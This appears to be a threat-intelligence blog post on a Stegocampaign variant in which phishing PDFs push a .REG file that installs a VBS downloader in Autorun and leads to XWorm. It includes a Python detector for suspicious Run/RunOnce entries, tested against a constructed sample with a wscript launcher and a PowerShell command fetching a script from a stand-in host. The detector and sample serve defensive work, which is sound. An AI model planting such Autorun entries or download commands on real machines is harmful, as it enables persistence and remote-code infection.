Hackers Deliver XWorm via Malicious Registry Files in a New Stegocampaign Attack


Stegocampaign, a complex attack that leverages phishing, a multi-functional RAT, a loader, and malicious scripts, got a new twist. ANY.RUN’s malware analysts discovered a Stegocampaign variant that uses a Windows registry file to add a malicious script to Autorun.

Although Autorun abuse has become rare in recent campaigns, a fresh sample featuring this method has been found.

The Attack Chain

Stegocampaign’s architecture from phishing attachment to RAT penetration
  • A user receives a phishing email with a PDF file attached.
  • In order to open the attachment, the user is directed to download “an extension”, which is in fact a .REG file.
The attack run in the sandbox: the user is asked to download the .reg file
  • Once downloaded and opened, this file modifies the registry with a script that fetches a VBS file from the web and adds it to Autorun.
  • After Windows reboots or the user logs in, the scheduled task is run. The VBS file launches PowerShell, triggering an execution chain that ultimately infects the operating system with ReverseLoader.
  • The loader downloads XWorm and starts it. The payload contains a DLL file embedded in an image, which then extracts XWorm from its resources and injects it into the AddInProcess32 system process.
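The .REG stage of this chain is the easiest one to catch before anything runs, because the file is plain text and the persistence it plants is an entry under a well-known Run/RunOnce key. The script below is an added example (not code from the post or from ANY.RUN) that parses a .reg export and flags Autorun values that launch or fetch a script; the sample .reg content and the host `placeholder.invalid` are constructed for the demonstration.

```python
import re

# Registry paths (suffixes) that Windows executes at logon, per the chain above.
AUTORUN_KEYS = (r"\currentversion\run", r"\currentversion\runonce")
# Tokens suggesting the Run value launches or downloads a script.
SUSPICIOUS = ("wscript", "cscript", "powershell", "mshta", ".vbs", "http://", "https://")
# Constructed sample .reg export modelled on the chain above; not the real file.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Updater"="wscript.exe //B \"%APPDATA%\\update.vbs\""

[HKEY_CURRENT_USER\Software\Example\Harmless]
"Theme"="dark"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Setup"="powershell -c \"iwr http://placeholder.invalid/u.vbs -OutFile u.vbs\""
'''

# Matches "name"=data lines; only quoted REG_SZ data is decoded (hex(2): and @= skipped).
VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<data>.*)$')

def unescape(s: str) -> str:
    # Undo .reg string escaping: \" becomes " and \\ becomes \
    return s.replace('\\"', '"').replace("\\\\", "\\")

def parse_reg(text: str) -> dict:
    """Return {key_path: {value_name: data}} for string values in a .reg file."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current and (m := VALUE_RE.match(line)):
            data = m.group("data")
            if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                keys[current][unescape(m.group("name"))] = unescape(data[1:-1])
    return keys

def find_autorun_abuse(text: str) -> list:
    """List (key, value_name, command) for Run/RunOnce entries that look like script loaders."""
    hits = []
    for key, values in parse_reg(text).items():
        if not key.lower().endswith(AUTORUN_KEYS):
            continue
        for name, data in values.items():
            if any(tok in data.lower() for tok in SUSPICIOUS):
                hits.append((key, name, data))
    return hits
```

Calling `find_autorun_abuse(SAMPLE_REG)` flags the two planted entries and ignores the harmless key; the same check can be run on .reg attachments quarantined by a mail gateway.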

Track Stegocampaign Evolution to Defend Proactively

This chain of actions abuses legitimate system tools and relies on user actions, making it difficult for automated security solutions to detect. It puts organizations at risk, potentially leading to data breaches and hackers accessing sensitive data.

To protect your network from this Stegocampaign tactic, use ANY.RUN’s Threat Intelligence Lookup to investigate known samples and find similar ones to enrich your understanding of the attack’s TTPs. 

Gather more indicators for fine-tuning your detection and response systems, and subscribe to automated search-result updates to be notified about the newest IOCs and the most recent Stegocampaign attacks spotted by the malware analyst community.

Given the domain template used by attackers, submitting “filemail.com” to TI Lookup shows recent malicious domain variants:

Multiple IOCs found through one domain pattern

The results list a number of associated IPs, abused domains, suspicious files and mutexes. 


Last but not least, the results include a selection of public analysis sessions of further Stegocampaign samples with varying payloads and parameters.

Stegocampaign attacks are extremely dangerous. They employ a number of phishing scenarios and persistence techniques, evolve constantly, and call for proactive protection, agile detection and response. 

Use threat intelligence solutions to keep up with cyber criminals and stay ahead of their attempts to abuse your resources. 

ANY.RUN’s Threat Intelligence Lookup plays a pivotal role in managing such threats. By investigating known samples and identifying similar attack patterns, organizations can gain deeper insights into the tactics, techniques, and procedures (TTPs) employed by adversaries.

This intelligence not only enhances the understanding of emerging threats but also empowers businesses to fine-tune their detection and response systems, ensuring a more robust defense posture.
